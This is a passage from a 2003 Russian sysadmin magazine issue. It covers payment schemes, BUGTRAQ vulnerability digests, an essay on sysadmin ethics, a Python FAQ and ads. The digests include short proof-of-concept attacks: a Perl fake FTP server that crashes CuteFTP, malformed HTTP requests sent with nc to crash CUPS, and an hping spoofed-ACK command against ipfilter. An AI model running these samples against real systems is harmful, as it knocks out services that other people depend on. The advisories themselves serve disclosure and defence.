доставленные ему идентификатор и
пароль. После того как владелец кар-
ты аутентифицирован сервером эми-
тента, последний формирует запрос
на сервер торговой точки, содержа-
щий сгенерированный эмитентом вир-
туальный номер карты.
По решению Maestro имеется не-
сколько вопросов, ответы на которые
явно не следуют из официального
описания схемы.
Во-первых, не определено, каким
образом торговая точка узнает ад-
рес сервера эмитента карты
Maestro. В простейшем случае тор-
говая точка знает адреса серверов
эмитента для некоторого ограничен-
ного набора префиксов (локальное
решение). В общем случае необхо-
димо создавать некоторую центра-
лизованную ди- ректорию адресов,
и тогда торговая точка должна об-
ращаться к серверу директории, ко-
торый уже маршрутизирует запрос
на сервер эмитента.
Второй вопрос связан с необходи-
мостью определения спецификации
интерфейса между торговой точкой и
сервером эмитента. Речь идет о се-
мантике и синтаксисе сообщений, ко-
торыми обмениваются торговая точ-
ка и сервер эмитента.
Распределение ответственности
при возникновении диспута по тран-
закции ничем не отличается от того,
каким образом оно производится при
использовании модели трех доменов.

Уязвимость в
Linux 2.2.xx /proc/<pid>/mem mmap()
Локальная системная уязвимость аварийного отказа
присутствует в Linux ядре 2.2.x. Система, вероятно, за-
виснет и потребуется ручная перезагрузка.
Интерфейс /proc/pid/mem предназначен, чтобы разре-
шить одному приложению при некоторых условиях обра-
титься к памяти другого приложения. Эта особенность
очень полезна для разработчиков или администраторов,
которые желают отладить или анализировать программы,
выполняющиеся на их системе. Один из способов обра-
титься к памяти непосредственно – использовать mmap().
Уязвимость обнаружена в способе, которым этот про-
цесс подтверждает правильность. Уязвимость позволяет
пользователю, используя интерфейс mmap(), обратиться
к страницам памяти, которые нечитаемы прослеживае-
мым процессом. Пользователь может передать параметр
PROT_READ для этого запроса, чтобы запросить доступ
для чтения к этому отображению. Из-за недостаточной
проверки правильности он получит такой доступ. Это при-
ведет к краху системы.
Подробности переполнения
буфера в Windows XP
Переполнение буфера существует в Explorer при ав-
томатическом считывании атрибутов MP3- или WMA-фай-
лов в Windows XP. Нападающий может создать злонаме-
ренный MP3- или WMA-файл в папке в системе Windows
XP, который может использоваться для удаленного вы-
полнения произвольного кода при просмотре такой папки
в Windows XP. При этом MP3-файл не должен быть запу-
щен, он просто должен быть сохранен в папке, которая
будет просмотрена, типа папки загрузки MP3, рабочего
стола или NetBIOS-ресурса.
Пользователь Windows XP, посещающий сайт с помо-
щью Internet Explorer, может быть дистанционно скомпро-
метирован без какого-либо предупреждения или загруз-
ки файлов, независимо от параметров настройки защи-
ты Internet Explorer.
В отличие от Windows 2000, Windows XP поддержива-
ет чтение и анализ атрибутов MP3- и WMA-файлов. Если
пользователь подсвечивает MP3- или WMA-файл курсо-
ром, будут отображены соответствующие подробности
файла. Explorer автоматически читает атрибуты файла,
независимо от того, действительно ли пользователь под-
свечивает или открывает файл. Переполнение произой-
дет, если некорректные атрибуты существуют внутри MP3-
или WMA-файла.
Пользователь просто должен просмотреть папку (ло-
кальный или сетевой ресурс), который содержит злонаме-
ренный файл. Например, пользователь может загрузить
MP3-файл, используя популярные пиринговые программы,
и затем открыть их MP3-папку (чтобы прослушать загру-
женный MP3-файл). После открытия папки Explorer выпол-
нил бы код, содержащийся внутри атрибутов файла.
Пользователи Windows 2000 неуязвимы при просмот-
ре таких MP3-файлов с испорченными атрибутами.
Два дополнительных вектора нападения существуют
№2(3), февраль 2003
BUGTRAQ
для этой уязвимости через веб-браузер и Outlook. Злона-
меренный сайт мог содержать IFRAME NetBIOS-ресурса,
который содержит злонамеренный MP3-файл. Точно так-
же можно послать HTML-электронное сообщение, кото-
рое содержит ссылку на NetBIOS-ресурс. Успех такого на-
падения зависит от параметров настройки Outlook. Напа-
дение через злонамеренный веб-сайт не зависит от пара-
метров настройки защиты Internet Explorer.
Уязвимость обнаружена в Windows Explorer для
Windows XP.
Переполнение буфера
в Hyperion FTP Server
Hyperion FTP Server (http://www.mollensoft.com/ ) – FTP-
server для Windows-систем. Уязвимость, обнаруженная в
Hyperion Ftp Server (version 2.8.11), позволяет удаленно-
му пользователю выполнять произвольный код. Перепол-
нение происходит при передаче длинного параметра (бо-
лее 300 байт) к команде Dir:
ftpservx.dll
who does not support dir+(buffer=300 byte)
Access violation - code c0000005 (first chance)
eax=0012bcbc ebx=0012c574 ecx=42424242 edx=7846f5b5
esi=0012bce4 edi=00147ffd
eip=42424242 esp=0012bc24 ebp=0012bc44 iopl=0 nv up
ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b
gs=0000 efl=00000246
42424242 ?? ???
Уязвимость обнаружена в Hyperion FTP Server 2.8.11.
Переполнение буфера в
Common Unix Printing System
Cups (Common Unix Printing System) – свободно дос-
тупный пакет для управления принтером от Cups Project
для Unix- и Linux-платформ.
Обнаруженная в CUPS уязвимость позволяет удален-
ному атакующему выполнять произвольный код на уязви-
мой системе. Нападающий может эксплуатировать эту
уязвимость, соединяясь с уязвимой системой и переда-
вая уродливые HTTP-заголовки с отрицательным значе-
нием для некоторых полей. Когда cupsd получит этот зап-
рос, его работа аварийно завершится. Пример:
$ nc -v localhost 631
localhost [127.0.0.1] 631 (?) open
POST /printers HTTP/1.1
Host: localhost
Authorization: Basic AAA
Content-Length: -1
$ nc -v localhost 631
localhost [127.0.0.1] 631 (?) open
POST /printers HTTP/1.1
Host: localhost
Authorization: Basic AAA
Transfer-Encoding: chunked
- - - - -FFFFFFFE
Уязвимость обнаружена в Easy Software Products CUPS
1.0.4-1.1.17 Apple MacOS X 10.2-10.2.2.
89
IMHO

ЭТИКА СИСАДМИНА

В замечательном романе Гарри Гариссона «Специалист по

этике» из цикла «Неукротимая планета» Язон ДинАльт говорит
такую фразу «Для меня святыня – Я!»... А чем
руководствуетесь вы в своей повседневной практике
системного администрирования?

АНДРЕЙ ГУСЕЛЕТОВ

90

Не так уж и давно, а именно – 26 июля
2002 года, я отмечал свой професси-
ональный праздник – «День систем-
ного администратора»1, что, впрочем,
наверняка делали и вы: какой же рус-
ский не любит быстрой езды и празд-
ников? Знал я об этом заранее и, как
на многие праздники, проснулся ут-
ром раненько с чувством легкой эй-
фории и в предвкушении чего-то нео-
быкновенного. Ну ничего необыкно-
венного в этот день не случилось,
правда, один мой друг с Мальты при-
слал мне ссылочку на сайт2, посвя-
щенный Дню системного администра-
тора. И вот, читая его содержимое, я
и задумался: «А что собственно ле-
жит в моральной основе моих дей-
ствий, в моей профессиональной эти-
ке?». Собственно, фраза, которая
меня толкнула на эти размышления,
звучит в оригинале так: «System
Administrator Appreciation Day – a
special day, once a year, to acknowledge
the worthiness and appreciation of the
person occupying the role, especially as
it is often this person who really keeps
the wheels of your company turning».
«День, посвященный системному ад-
министратору, – особый день в году,
в который вы можете выразить, на-
сколько вы цените и признательны че-
ловеку, занимающему это место [си-
стемного администратора], так как ча-
сто это тот, кто действительно помо-
гает крутиться «колесам» вашей ком-
пании»). Вот и поехали, я буду поти-
хоньку это раскручивать.
Скажем честно: было у вас когда-
нибудь желание «зарезать» особо
противному пользователю квоту или
доступ в Интернет, не потому что он
нарушил какие-то правила фирмы, а
потому что насолил вам лично? Пси-
хологи, когда ставят такой вопрос в
тест, обычно подразумевают шкалу
невалидности – т.е. честный ответ
должен быть утвердительным, «да,
хотелось, но ?». А что но? Чем я не
царь и не бог. «Рраз – и готово». К
сожалению, не раз слышал от
пользователей предположения о том,
что так и происходит. «Вот, у меня с
N-ского сайта еле качается, это ты
мне урезал, я знаю!». Отвечаю вам,
читатели; нет, никогда за уже без
малого 5 лет на этом рабочем месте
я такого не делал и не собираюсь. Я
бы хотел, чтобы все мы – системные
№2(3), февраль 2003
администраторы – имели некий ко-
декс чести. Чтобы не оступиться. Да-
вайте его создадим?
Действительно, задумайтесь: в
типичной небольшой организации
(около 60-90 компьютеров) систем-
ный администратор зачастую имеет
практически неограниченные права.
Я специально не буду рассматривать
ситуацию с раздельным админист-
рированием (когда, например, один
занимается только правами на ди-
ректории, второй – пользовательс-
кими бюджетами, а за дисковые кво-
ты отвечает третий человек). Да, та-
кие системы и идеологии существу-
ют. Но где они реально работают?
Вернемся к нашей преуспевающей
фирме: эта гипотетическая органи-
зация развивалась очень быстро, за
3-4 года штат компьютеров увели-
чился с 3 до 50, и, соответственно,
первоначально работавший там про-
граммистом человек, паренек лет
20-24 (уж очень в нашей стране лю-
бят экономить деньги, нанимая сту-
дентов) теперь фактически работа-
ет системным администратором.
Пусть его зовут Костя. Да, он где-то
подучился, уже умеет достаточно
прилично ставить Windows 2000
Advanced Server, кое-что знает о
Linux и коммуникациях, зачастую он
же параллельно занимается и офис-
ной АТС. Вот, казалось бы, а что еще
надо? А как он разговаривает с
пользователями, что он о них дума-
ет? Случай из практики.
Технически подкованный моло-
дой человек, с высшим образовани-
ем, назовем его Алексеем, в разго-
воре с начальником отдела, отзыва-
ясь о своих пользователя говорит:
«...да нет, я им всё быстро сделал.
Всего-то и надо было – форматнуть
дискету», и вывод, заметьте – «ла-
мерьё». Уж извините меня за жар-
гон. Человек Алексей достаточно
нормальный, в повседневном обще-
нии достаточно приятный, ну а вот
такое пренебрежительное отноше-
ние к людям, которые о компьюте-
рах знают меньше его – проскаки-
вало не один раз. Как вы думаете –
такой человек, при хорошем, я имею
в виду, при действительно хорошем
руководителе – далеко по служеб-
ной лестнице пойдет? Вряд ли. А
таких людей – даже не сотни, и не
IMHO
тысячи, а, боюсь, гораздо больше...
Вот ведь какая штука получает-
ся – недостаточно иметь отличные
технические познания, для того
чтобы быть хорошим сис-
темным администратором,
надо еще и уважать людей не
только за их познания о компью-
терах. Нет, я не призываю вас бро-
саться целоваться с любителем ваз
эпохи Минь или акварельных рисун-
ков на рисовой бумаге. Совсем нет.
(Каким бы это не показалось смеш-
ным и надуманным, но вот как раз
последнее – японские акварели на
рисовой бумаге – я просто обожаю.)
Но и подходить к людям с мерилом
по их познанию NTFS или sendmail
тоже нельзя.
Допустим, с одной вещью я разоб-
рался, поднимаю своего Константи-
на (еще помните? паренёк-админис-
тратор в небольшой, но весьма пре-
успевающей российской фирме) на
ступенечку выше – теперь он уважа-
ет бухгалтера Степан Васильевича,
как оказалось, у того дома живут
четыре канарейки, и он столько все-
го может о них рассказать – просто
заслушаешься! И приходит к Кон-
стантину девушка-диспетчер:
– Костя, вот у меня тут отчет не
читается, ты не мог бы посмотреть,
может у меня что-то с дисководом ?
– Угм, – тихо буркнул себе под нос
Костя, даже не повернувшись на го-
лос, хотя в этот момент просто откры-
вал описание очередной утилиты для
автоматического пинга нескольких
серверов одновременно. Естествен-
но никуда он сразу не побежал...
А представляете, как будет себя
вести такой человек, когда ему что-
то нужно сделать на компьютере, на
котором у же работает какой-то
пользователь – молча подходит,
двигает человека, что-то делает и
удовлетворенный уходит – всё мол-
ча! Ага, вот вам и второй пункт:
Хороший системный администра-
тор должен быть челове-
ком коммуникабельным и
желательно дружелюбным. Пусть
я прихожу на работу, а у меня дома
болеет ребенок, пусть на улице сля-
коть и мерзость, но вспоминаю –
семьдесят пользователей, и боль-
шая часть из них надеется именно
на меня, я просто не имею никакого
91
 IMHO
права не оправдать их надежды, я
не имею права хамить им! Так, сде-
лаем Косте модернизацию... Кстати,
как вы называете upgrade – апгрейд,
я, например, – улучшение или мо-
дернизация, хотя признаюсь, такой
вариант англоязычного термина
меня не до конца устраивает. Под-
нимаю своего человечка еще выше,
на следующую ступеньку.
Уже почувствовали, что будет
дальше? Правильно – коммутаторы,
концентраторы, оперативная память
и жесткие диски, а не – свитч НетГи-
ар ФС-116, хаб, рамка и винт. Опять
же, не надо фанатизма, я не призы-
ваю вас выкинуть из употребления
все заимствованные слова, призна-
юсь честно, – винчестер я вставил
специально, так как это слово счи-
таю достаточно спорным. Если вы по-
мните, и англичане также называют
жесткие диски иногда винчестерами,
но никак не пристало нам, носителям
самого могучего и богатого языка в
мире говорить – «хардник накрыл-
ся». Причем я стараюсь избегать
жаргонных слов везде, где это воз-
можно, в особенности это поможет
вам и вашей бухгалтерии при очеред-
ной модернизации сервера – куда
как проще продиктовать по телефо-
ну (и записать в доверенность), что
нужно оплатить четыре жестких дис-
ка и сетевую двухпортовую карту,
чем – четыре харда и одну двухголо-
вую сетевуху...
Вот вам и следующая сентенция:
мы – русские (украинцы, белорусы) –
славяне, в общем, поэтому в по-
вседневной работе с пользовате-
лями хорошему администратору
следует избегать использо-
вания сленговых выраже-
ний и фонетических калек из ино-
странных языков. И для себя луч-
ше при постоянном общении с эти-
ми железяками (компьютерами, кон-
центраторами и маршрутизаторами
– список длинный) лучше иногда
всплыть на поверхность и немного
поразмышлять как обычный чело-
век, нормальным языком. Стал наш
Костя говорить по-русски и перешел
еще на одну ступеньку вверх.
Вот и всплыло в предпоследней
фразе – как бы это не было баналь-
но, мы от обычных людей всё-таки
отличаемся, конечно, в этом ничего
92
сверхъестественного нет. Точно так
же отличается булочник от ювелира
или пилот от акушера-гинеколога. И
про это тоже не следует забывать.
Вспомните время обучения в инсти-
туте или в школе – если знаешь от-
вет, так хочется всё пропустить, не
писать промежуточные вычисления
– «я же могу их сделать в уме», – а
сразу написать конечный ответ. Но
так нельзя, по крайней мере, в ра-
боте с пользователями. Вы знаете
больше среднестатического пользо-
вателя, и если делаете что-то, улуч-
шающее его работу, то постарай-
тесь это донести до него. Опустите
детали – скажите суть. А то иногда
ваше неочевидное улучшение вос-
примется «в штыки», и какое-же это
тогда улучшение? Естественно, бы-
вает, я делаю какие-то настолько
неочевидные манипуляции, что без
вступительной лекции не обойтись,
а иногда политика безопасности
просто не позволяет долго распрос-
траняться на определенную тему,
что ж, – молчим. Итак, я для себя
сказал: «Хороший администратор
должен объяснять или чётко моти-
вировать пользователям
свои действия в тех случа-
ях, когда это возможно». Опять-же
привожу пример:
В одной достаточно немаленькой
фирме на центральном сервере по-
надобилось поставить более мощ-
ную сетевую карту, так как имеюще-
еся 100-мегабитное соединение с
сервером стало узким местом при
доступе к нему. Соответственно, ру-
ководитель отдела информатизации
попросил администратора оповес-
тить людей. Что тот и сделал – вы-
весил такое объявление:
Îáúÿâëåíèå!
Çàâòðà ñ 8-00 äî 9-00 óòðà ñåðâåð
ðàáîòàòü íå áóäåò.
Ñèñòåìíûé àäìèíèñòðàòîð.
Соответственно, экономический
отдел, который как раз в это время
заканчивал полугодовой отчет (кста-
ти, установка мощной двухпортовой
серверной сетевой карты значитель-
но ускоряла им работу) начал возму-
щаться: «Как так, мол, нам работать
надо», и естественно, именно завтра,
именно этот промежуток времени
стал решающим. Выход, правда, был
найден – другой системный админис-
тратор пошел в экономический отдел
и объяснил «на пальцах» что нужно
сделать и зачем. После чего текст
объявления изменили. Сетевую кар-
ту поставили, отчет был сделан вов-
ремя, и все остались довольны!
Вот так наш Костя теперь моти-
вирует свои действия в разговорах
с пользователями и таким образом
поднимается еще выше, и теперь это
«человек, приятный во всех отноше-
ниях». Ну почти. Есть еще одна
вещь: как и врач, системный адми-
нистратор должен четко соблюдать
принцип «тайны административной
практики» – вот это сказано неудачно,
но требовалось для сходства с ориги-
налом. Суть же, я думаю, понятна –
хороший администратор никогда не
разглашает «личную» информацию
пользователя: его настрой-
ки, пароли, какие-то особен-
ности бюджета, если конечно не
случилось аварии (происшествия)
которые требуют обратных дей-
ствий. Вот – снял перчатки, помыл
руки, и – молчок. А это тоже нелегко,
так язык иногда и чешется. Ну всё, те-
перь личность, стоящая на вершине
пирамиды, – наш Константин – про-
сто подарок для фирмы: умный, зна-
ющий, коммуникабельный, надеж-
ный – всего не перечислишь. Вот та-
кого работника можно считать насто-
ящим системным администратором.
Может быть, кто-то примет это всё
за одну большую шутку, ну что ж – это
ваше право, собственных мыслей у
нас никто не может отобрать. Я ста-
раюсь следовать тому, что здесь
высказал. Кроме того, всегда от-
крыт для дискуссии и новых мыслей.
Если что – пишите.
Осталось только одно – чтобы
моего идеального системного адми-
нистратор ценили, не боготворили,
нет, – просто ценили. Любому нор-
мальному человеку этого вполне до-
статочно, системному администра-
тору – тоже... especially as it is often
this person who really keeps the
wheels of your company turning.
1
Отмечается в последнюю пятни-
цу июля, но корней праздника, к сво-
ему великому стыду, я не знаю.
2
Вот он – http://www.sysadmin-
day.com.
 FAQ Python

ВОПРОС: ВОПРОС:
Можно ли на Python создавать программы с графичес- Есть ли в Python аналог следующего оператора Perl:
ким интерфейсом?
S =~ s/(text)/f($1)/ge;

ОТВЕТ:
Да. Даже в стандартной поставке Python есть пакет
Tkinter – многоплатформенные средства для графичес-
кого интерфейса на основе Tcl/Tk. Помимо этого, для
Python можно найти привязки к более чем десятку других
GUI-библиотек. Наиболее продвинутым средством счита-
ется wxPython. Python для Java (Jython) может использо-
вать стандартные для Java библиотеки (AWT, Swing).
ВОПРОС:
Можно ли на Python написать простенький HTTP-сервер?
ОТВЕТ:
Да. Более того, в стандартной поставке Python есть
несколько готовых примеров: BaseHTTPServer.py,
CGIHTTPServer.py и т. п.
ОТВЕТ:
В языке Python регулярные выражения записываются
так же, как и в Perl, но операции по поиску, сопоставле-
нию, заменам и т. п. производятся с помощью функций
модуля re. Следующий код Python соответствует приве-
денному выше выражению:
import re S = re.sub(«(text)», lambda m: f(m.group(1)), S)
То есть в качестве второго аргумента функции re.sub()
может выступать функция, которой в качестве аргумента
передается объект с очередным успешно найденным
фрагментом строки.
Более развернутый вариант:
import re def subf(m): return f(m.group(1))
S = re.sub(«(text)», subf, S)
Составил Роман Сузи

Оформляйте
подписку
на журнал
через агентство
«Роспечать»
Подписные
индексы:
для частных лиц

81655
для организаций и
предприятий

81656

Рады видеть
Вас нашими
читателями!

№2(3), февраль 2003 93

 BUGTRAQ
Переполнение буфера в CuteFTP
CuteFTP – популярный FTP-клиент для Windows-систем.
В программе обнаружена возможность удаленного
переполнения буфера, которая может использоваться
злонамеренным FTP-сервером для выполнения произ-
вольного кода на системе клиента. Переполнение проис-
ходит при получении FTP-баннера большого размера (бо-
лее 2048 Кб). Пример FTP-сервера, который убивает кли-
ентский CuteFTP:
#!/usr/bin/perl
use IO::Socket;
$port = "21";
$data = "a";
$num = "2049";
$buf .= $data x $num;
$server = IO::Socket::INET->new(LocalPort => $port, Type
=> SOCK_STREAM,
Reuse => 1, Listen => 2) or die "Couldn't create ftp-
server: $_\n";
while ($client = $server->accept()) {
print "Client connected.\n";
print "Attacking...";
print $client "$buf";
print "OK\n";
close($client);
}
#EOF
Уязвимость найдена в CuteFTP v.4.2 и, возможно, в
более новых версиях.
Уязвимость обнаружена D4rkGr3y из Damage Hacking
Group.
Определение фильтрующих устройств
в большинстве пакетных фильтров
Большинство пакетных фильтров от различных произ-
водителей не проверяют контрольную сумму четвертого
уровня. Это позволяет атакующему выполнить активный
анализ правил межсетевой защиты и использовать инст-
рументы OS fingerprinting, анализируя пакеты ответа меж-
сетевой защиты. Эта проблема присутствует, даже если
используется прозрачный мост. Пример: посылая TCP
SYN, вы получите RST-ACK.
Утечка информации во многих
драйверах сетевых Ethernet-устройств
Драйвера устройств Network Interface Card (NIC) для
различных платформ неправильно обрабатывают запол-
нения фреймов, позволяя атакующему просматривать
части предварительно переданных пакетов или памяти
ядра. Эта уязвимость – результат неправильного выпол-
нения RFC-требований и неправильного программирова-
ния, комбинация которых приводит к нескольким разно-
видностям этой уязвимости утечки информации.
Самое простое нападение, использующее эту уязви-
мость, должно посылать ICMP echo сообщения машине с
уязвимым Ethernet-драйвером. В этом случае атакующе-
му будут возвращены части памяти ядра вместе с отве-
том. В результате испытаний обнаружено, что возвращен-
ные части – обычно отрывки сетевого трафика, которым
обменивается уязвимая машина. Это нападение позво-
ляет атакующему просматривать части сетевого трафи-
ка, которым обменивается в сетевом сегменте маршру-
тизатор или межсетевая защита, и к которому атакующие
94
не имеют прямого доступа. Важно обратить внимание, что
нападающий должен быть в той же самой локальной
Еthernet-сети, что и уязвимая машина, чтобы получить
Ethernet-фреймы.
Детальную информацию об обнаруженной уязвимос-
ти можно получить отсюда: www.atstake.com/research/
advisories/2003/atstake_etherleak_report.pdf.
Межсайтовый скриптинг
в Internet Explorer
Обнаруженная уязвимость в IE позволяет удаленному
атакующему вставить произвольный код сценария в URL
flash-объекта, который будет автоматически выполнен при
загрузке злонамеренной веб-страницы, в контексте уяз-
вимого сайта. Уязвимость может использоваться для кра-
жи чувствительных данных, хранящихся в куки. Пример:
http://www.macromedia.com//shockwave/download/
triggerpages_mmcom/
Уязвимость обнаружена в Internet Explorer 5.0-6.0.Не-
достаток регистрации соединений.
Недостаток регистрации соединений
с неправильной контрольной суммой
TCP/ACK-пакета
Когда ipfilter получает пакет с ACK-битом без предва-
рительно установленного SYN, программа отметит такой
пакет как TCPS_ESTABLISHED в таблице состояний, и
когда RESET-пакет будет послан обратно системным при-
ложением, программа изменит TTL в таблице состояний
к 1 минуте.
Но если атакующий пошлет пакет с ACK-битом и пло-
хой контрольной суммой, ipfilter добавит “ESTABLISHED”-
сессию в таблицу состояний с тайм-аутом, равным 120
часов вместо 1 минуты.
Используя эту методику, атакующий может легко унич-
тожить сетевое подключение любой системы с установ-
ленным ipfilter за несколько минут! Пример:
[yiming@security.zz.ha.cn]#hping -s
ip.of.spoofedandtrusted.box -A
ip.of.target.box -p 22 -c 1 -b
you will immediately see a a long wait ttl of 120 hours,
like this
security.zz.ha.cn,1235 server,22 4/0 tcp 1
40
119:59:48
Уязвимость обнаружена в IP Filter 3.4.29-3.4.30.
Недостаток в проверке сертификатов в
Windows File Protection
Файлы, подписанные с использованием code-signing-
сертификатов, выпущенных любым доверяемым корне-
вым сертификатом, будут доверены WFP (Windows File
Protection). Эти файлы могут быть системными файлами
операционной системы и драйверами устройства. Т.е.
любой атакующий, способный подписываться любым до-
веренным корневым сертификатом, может создать под-
писанный код, которому будет доверять система.
Уязвимость обнаружена в Microsoft Windows 2000/XP.
 Во втором, улучшенном и В книге обсуждаются
обновленном издании кни- вопросы профессиональ-
ги, посвященной новой тех- ной разработки приложе-
нологии информационной ний в Borland Delphi 7 и
безопасности – обнаруже- особое внимание уделя-
нию атак, систематизируют- ется практике програм-
ся разрозненные данные о мирования.
приемах совершения атак, Представлено де-
исследуются различные тальное описание объек-
критерии атак и признаки тной концепции, стан-
их обнаружения, источники дартных и программных
информации об атаках и технологий, используе-
методы их анализа. Приве- мых при работе програм-
дена подробная классифи- мистов.
кация систем обнаружения Значительная часть
атак с примерами конкрет- материала посвящена
ных отечественных и зарубежных решений. Рассматривают- разработке приложений, базирующихся на широко ис-
ся критерии выбора систем обнаружения атак для различных пользуемых и перспективных технологиях доступа к
групп потребителей, имеющих разные приоритеты при пост- данным: ADO, dbExpress, InterBase Express.
роении инфраструктуры обнаружения атак. Большое внима- Распределенным многозвенным приложениям и тех-
ние уделено практике эксплуатации систем обнаружения атак, нологии DataSnap также отведено достойное место. Все
включая вопросы их установки и размещения. Впервые све- рассматриваемые в этой книге темы сопровождаются
дены воедино и описаны недостатки существующих средств подробными примерами, которые помогут быстро ос-
обнаружения атак и способы их преодоления. воить данный этот язык программирования.
ISBN 5-94157-246-8, 608 стр ISBN 5-94157-116-Х 784 стр.

Книга посвящена опера- Книга известного экспер-

ционной системе Linux. та по сетевым технологи-
Приводятся подробные ям, автора и редактора
сведения о ее особеннос- многих публикаций К.За-
тях и возможностях, иде- кера представляет собой
ологии файловой систе- полное руководство по со-
мы, инсталляции и основ- зданию, конфигурирова-
ных командах, вопросах нию и обслуживанию ло-
компиляции ядра, на- кальных сетей. Подробно
стройках и сервисах. рассматриваются особен-
Большое внимание ности применения аппа-
уделяется организации на ратногои программного
базе Linux различных сер- обеспечения, возможнос-
веров и служб: электрон- ти различных версий сете-
ной почты, WWW, FTP, вых операционных систем
INN, Proxy, NTP, а также Windows, Novell NetWare,
проблемам администрирования сети, обеспечения безопас- UNIX и их компонентов, проводится детальный разбор
ной работы и пр. Описаны способы настройки под Linux практически всех используемых ныне технологий и ком-
рабочих станций, в т. ч. и бездисковых, установки и эксп- муникационных протоколов, таких как Ethernet и Token
луатации на них графических сред типа X Window, а также Ring, от стандартов ранних версий до современных. Кни-
конфигурирование модемных соединений, принтеров и ска- га содержит обзор популярных технических и программ-
неров, отладка взаимодействия с Linux-машинами такой ных решений для WWW, затрагивает взаимодействие ло-
“экзотической“ периферии, как карманные компьютеры, мо- кальных и глобальных сетей на всех уровнях. Также осве-
бильные телефоны, TV-тюнеры и т. п. Рассматриваемые в щаются вопросы функционирования различных сетевых
книге конфигурационные файлы и структура каталогов со- служб и сервисов (DNS, WINS, DНСР). Дается множество
ответствуют дистрибутиву Red Hat Linux 7.x, тем не менее, полезных рекомендаций, которые будут интересны как
при минимальной адаптации все упоминаемые в книге па- профессионалам, так и новичкам. Для сетевых админис-
кеты устанавливаются в любом дистрибутиве Linux. траторов и проектировщиков сетей.
ISBN 5-94157-146-1, 888 стр. ISBN 0-07-212256-0, 5-94157-042-2, 1008 стр.

2
 СИСТЕМНЫЙ АДМИНИСТРАТОР
№ 2(3), Февраль, 2003 год
РЕДАКЦИЯ
Исполнительный директор
Владимир Положевец
Главный редактор
Александр Михалев
chief@samag.ru
Ответственный секретарь
Наталья Хвостова
sekretar@samag.ru
Технический редактор
Владимир Лукин
Художник
Игорь Усков
igus@samag.ru
РЕКЛАМНАЯ СЛУЖБА
тел.:(095)928-8253 (доб. 112)
факс:(095)928-8253
Константин Меделян
reklama@samag.ru
Верстка
imposer@samag.ru
maker_up@samag.ru
103012, г. Москва,
Ветошный переулок, дом 13/15
тел.: (095) 928-8253 (доб. 112)
факс: (095) 928-8253
Е-mail: info@samag.ru
Internet: www.samag.ru
РУКОВОДИТЕЛЬ ПРОЕКТА
Петр Положевец
УЧРЕДИТЕЛИ
Владимир Положевец
Александр Михалев
ИЗДАТЕЛЬ
ЗАО «Издательский дом
«Учительская газета»
Отпечатано типографией
ООО «Мастер Печати»
Тираж 5000 экз.
Журнал зарегистрирован
в Министерстве РФ по делам печати,
телерадиовещания и средств мас-
совых коммуникаций (свидетельство
ПИ № 77-12542 от 24 апреля 2002г.)
За содержание статьи ответственность
несет автор. За содержание рекламно-
го обьявления ответственность несет
рекламодатель. Все права на опубли-
кованные материалы защищены. Ре-
дакция оставляет за собой право изме-
нять содержание следующих номеров.
ЧИТАЙТЕ
ЧИТАЙТЕ
В СЛЕДУЮЩЕМ
В СЛЕДУЮЩЕМ
НОМЕРЕ:
НОМЕРЕ:
Перехват системных
вызовов в ОС Linux
За последние годы операционная си-
стема Linux прочно заняла лидирую-
щее положение в качестве серверной
платформы, опережая многие ком-
мерческие разработки. Тем не менее
вопросы защиты информационных
систем, построенных на базе этой ОС,
не перестают быть актуальными.
Обеспечение безопасности системы
требует выполнения целого комплек-
са мероприятий. Предлагаем вам рас-
смотреть механизм защиты, основан-
ный на перехвате системных вызовов
операционной системы Linux. Данный
механизм позволяет взять под конт-
роль работу любого приложения и тем
самым предотвратить возможные де-
структивные действия, которые оно
может выполнить.
TACACS
Это протокол аутентификации кисок
на сервере. Я опишу основные прин-
ципы настройки сервера и клиента
(киски) TACACS+ (плюс указывает
на версию протокола, которая ис-
пользуется в настоящее время).
TACACS имеет очень широкое при-
менение, так как может обеспечи-
вать работу всех кисок с единым
сервером авторизации, который так-
же позволяет настраивать привиле-
гии различных пользователей в ши-
роких пределах, например: давать
определённым пользователям дос-
туп только к определённым коман-
дам, давать определённым лицам
пользоваться определёнными сер-
висами только с заданных адресов,
организовывать группы пользовате-
лей, вести лог-файл доступа пользо-
вателей (это особенно важно для
маршрутизаторов, так как позволя-
ет определить, кто и сколько пользо-
вался определёнными сетевыми
службами: ppp, slip и т. д.), выпол-
нять для пользователей определён-
ные команды ОС.
Некоторые
недокументированные
функции Java
Изучение недокументированных фун-
кций в применении к языку Java мо-
жет показаться несколько странным.
Java – грамотный, современный, вы-
соконадежный объектно-ориентиро-
ванный язык программирования с об-
ширнейшими библиотеками готовых
классов.
Неужели в среде Java существу-
ют задачи, которые не решаются с по-
мощью стандартных библиотек, и для
решения которых имеет смысл прибе-
гать к недокументированным функци-
ям? И что вообще такое «недокумен-
тированная функция» в рамках Java?
Можно ли защитить
веб-страницы от анализа
исходного кода?
Можно ли как-то помешать програм-
мисту-профессионалу, располагаю-
щему сколь угодно богатым арсена-
лом специализированных программ –
отладчиком, собственной версией
браузера с исходными текстами, вир-
туальной машиной и любыми други-
ми средствами – проанализировать
исходный HTML-код веб-страницы
или, по крайней мере, клиентский
JavaScript?
Если это и возможно, то так же
трудно, как реализация схемы защи-
ты, описанной в этой статье.
Установка FreeBSD
Если бы у меня спросили, какую опе-
рационную систему я бы установил в
качестве сервера из Windows, Linux и
различных вариантов BSD, я бы не
задумываясь ответил: FreeBSD. Поче-
му? Стабильность серверов под уп-
равлением этой системы уже давно ни
у кого не вызывает сомнений. Чтобы
работать в системе, необходимо пер-
воначально ее установить. Описани-
ем чего, собственно говоря, и займем-
ся в этой статье.

96